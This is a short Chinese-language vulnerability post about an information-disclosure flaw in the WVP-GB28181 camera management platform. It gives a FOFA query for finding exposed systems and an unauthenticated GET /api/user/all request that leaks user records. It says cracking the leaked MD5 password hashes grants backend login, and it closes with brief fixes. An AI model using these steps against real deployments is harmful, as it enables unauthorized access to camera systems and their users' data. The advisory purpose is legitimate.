WVP-GB28181摄像头管理平台user信息泄露漏洞
WVP-GB28181摄像头管理平台user信息泄露漏洞
原创 骇客安全 骇客安全 2025-01-31 04:02
漏洞描述WVP-GB28181摄像头管理平台 user 信息泄露漏洞,攻击者可利用此漏洞收集敏感信息,从而为下一步攻击做准备。漏洞复现1、fofabody=”国标28181″2、部分界面如下 3、隐患url,验证如下GET /api/user/all HTTP/1.1Host: your-ip4、解密密码md5值即可登录后台 修复建议1、请联系厂商进行修复。 2、如非必要,禁止公网访问该系统。 3、设置白名单访问。